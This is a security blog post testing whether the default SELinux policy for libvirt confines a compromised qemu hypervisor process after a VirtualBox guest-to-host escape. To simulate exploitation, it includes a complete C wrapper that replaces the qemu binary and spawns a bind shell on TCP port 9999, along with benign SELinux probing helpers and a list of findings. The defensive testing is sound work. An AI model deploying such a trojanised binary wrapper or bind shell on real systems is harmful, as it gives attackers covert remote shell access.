Hypervisor escape and SELinux
Yesterday someone released a 0-day exploit for a vulnerability in the VirtualBox E1000 network card emulation. When this vulnerability is exploited successfully, the attacker gains the privileges of the hypervisor process on the host.
These things do exist, and VirtualBox is not the only hypervisor in this game. The CVE list for qemu is also pretty impressive.
So what exactly is so serious about this sort of exploitation? The bottom line is this: people often use a hypervisor to contain code for security purposes, so a guest-to-host escape renders this security measure totally useless. The best way to think about it is as just another type of privilege escalation. And it doesn’t stop there: once the malicious code is running on the host system, all the other guests are in danger as well, not just the exploited one.
Hypervisors like VirtualBox, VMware and qemu are very complicated, so we had better prepare for this type of privilege escalation vulnerability. How do we do that?
Well, it turns out that at least on RH-based systems (RHEL, Fedora, CentOS) the default SELinux policy for libvirt provides a pretty decent mitigation for qemu-based VMs, as explained in Dan Walsh’s blog. The idea is simple: the hypervisor should be able to access only what is required to run the VM, that is, its configuration, its disk files and so on. It should not be able to access the user’s home directory, execute arbitrary binaries, etc. This sounds like a good mitigation, but does it work in practice? Let’s find out.
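To make "confined" a bit more concrete, here is a minimal sketch of how a process can inspect its own SELinux label on Linux by reading /proc/self/attr/current. The helper names are hypothetical, and the type svirt_t used in the usage note is an assumption about the libvirt policy (it is not named in this post); check what your own system reports.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Copy the calling process's SELinux context into buf.
 * Returns 0 on success, -1 if it cannot be read (for example when
 * SELinux is disabled). On failure buf is left as an empty string. */
int current_selinux_context(char *buf, size_t len) {
    assert(buf != NULL && len > 0);
    buf[0] = '\0';
    FILE *f = fopen("/proc/self/attr/current", "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, len - 1, f);
    int failed = ferror(f);
    fclose(f);
    if (failed) {
        buf[0] = '\0';
        return -1;
    }
    buf[n] = '\0';
    buf[strcspn(buf, "\n")] = '\0';   /* drop a trailing newline, if any */
    return 0;
}

/* Return 1 if the type field of a "user:role:type:level" context
 * is exactly `type`, 0 otherwise (including malformed contexts). */
int context_has_type(const char *context, const char *type) {
    const char *p = strchr(context, ':');   /* end of the user field */
    if (p == NULL)
        return 0;
    p = strchr(p + 1, ':');                 /* end of the role field */
    if (p == NULL)
        return 0;
    p++;                                    /* start of the type field */
    size_t n = strcspn(p, ":");             /* type ends at next ':' or at the end */
    return strlen(type) == n && strncmp(p, type, n) == 0;
}
```

Calling current_selinux_context() from inside a process started by libvirt and then context_has_type(buf, "svirt_t") would tell you whether that process runs under the (assumed) confined type. The part of the context after the type holds the level and categories.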
First I wanted to figure out the simplest way to simulate hypervisor exploitation, so I cut some corners and assumed that the malicious code would already be running fully on the host. I wrote this very simple wrapper for executing qemu-system-x86_64:
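#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>   /* fork, dup2, execv, _exit */

int main(int argc, char **argv) {
    (void)argc;
    pid_t pid = fork();
    if (pid == 0) {
        /* evil shellcode: bind shell on TCP port 9999 */
        int host_sock = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in host_addr;
        memset(&host_addr, 0, sizeof(host_addr));
        host_addr.sin_family = AF_INET;
        host_addr.sin_port = htons(9999);
        host_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
        listen(host_sock, 0);
        int client_sock = accept(host_sock, NULL, NULL);
        /* attach the shell's stdin, stdout and stderr to the connection */
        dup2(client_sock, 0);
        dup2(client_sock, 1);
        dup2(client_sock, 2);
        /* pass a proper argv; a NULL argv is not portable */
        char *shell_argv[] = { "/bin/sh", NULL };
        execv("/bin/sh", shell_argv);
        _exit(1);   /* only reached if the shell could not be started */
    } else {
        /* parent: become the real qemu, keeping arguments and environment */
        execv("/usr/bin/qemu-system-x86_64-real", argv);
    }
    return 1;   /* only reached if execv of the real qemu failed */
}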
The above code simulates shellcode by forking a child process that spawns a bind shell on port 9999, while the parent executes the real qemu binary with the original arguments and environment. I tested this from the command line, and everything works: qemu runs, and so does the “exploit code”.
Then I renamed qemu-system-x86_64 to qemu-system-x86_64-real, copied my wrapper in its place as qemu-system-x86_64, and this time started qemu implicitly through virt-manager. The VM ran normally, and the bind shell was listening on port 9999. This is more or less what the bad guys would do. Instead of spawning a shell like this, they would most likely try to fetch the actual payload from some network location, but for my SELinux testing the shell is useful because it shows what the attacker would see when running with the privileges of the host process.
So what can the qemu host process access, and what can it not? I did some very quick tests:
- It can access the processes started by the qemu-system-x86_64 wrapper itself: the real qemu process, the shell, and all its child processes. Nothing else. So it cannot access, for example, browsers or anything else running on the host. It cannot even see them (the ps list is basically empty).
- It can read system-readable files, for example in /etc.
- It can write to system-writable locations, such as /tmp.
- It can initiate network connections (this is obvious, since the guest is supposed to be able to do this freely).
- It cannot access other qemu processes (because of the random MCS labels).
- It cannot even cd to /home/user.
- Many applications won’t function properly: I got lots of error messages for the mmap system call. Some programs, like ping or sudo, won’t run at all (access denied), most likely because of the SUID bits.
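Quick checks like the ones in this list can also be scripted. The following is a minimal sketch of two probe helpers, not the exact commands I ran from the shell; the function names are hypothetical, and any specific file you probe (such as /etc/passwd) is your own choice. Each helper returns 0 when the operation is allowed and the errno value otherwise, so an SELinux denial typically shows up as EACCES.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Try to open path with the given flags.
 * Returns 0 if the open succeeded, otherwise the errno from open(). */
int probe_open(const char *path, int flags) {
    assert(path != NULL);
    int fd = open(path, flags);
    if (fd < 0)
        return errno;
    close(fd);
    return 0;
}

/* Try to create (and immediately remove) a scratch file inside dir.
 * Returns 0 if the file could be created, otherwise an errno value. */
int probe_create(const char *dir) {
    assert(dir != NULL);
    char path[4096];
    int n = snprintf(path, sizeof path, "%s/probe-XXXXXX", dir);
    if (n < 0 || (size_t)n >= sizeof path)
        return ENAMETOOLONG;
    int fd = mkstemp(path);   /* replaces XXXXXX with a unique suffix */
    if (fd < 0)
        return errno;
    close(fd);
    unlink(path);
    return 0;
}

/* Print one result line: "allowed" or the error text for err. */
void report(const char *what, int err) {
    printf("%-28s %s\n", what, err == 0 ? "allowed" : strerror(err));
}
```

For example, report("enter /home/user", probe_open("/home/user", O_RDONLY | O_DIRECTORY)) and report("write to /tmp", probe_create("/tmp")) cover two of the items above. Running the same probes once from an ordinary shell and once from the confined bind shell makes the difference easy to compare.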
So at the very least the compromised qemu is able to poke around in the system and determine the system configuration, but it cannot (at least not very easily) install any code, modify any system files, or get any sensitive information from running processes. It can gather system information from /etc and send it off to the mothership, but it can hardly claim to own the system. Much more than that is needed, namely a privilege escalation out of the SELinux sandbox.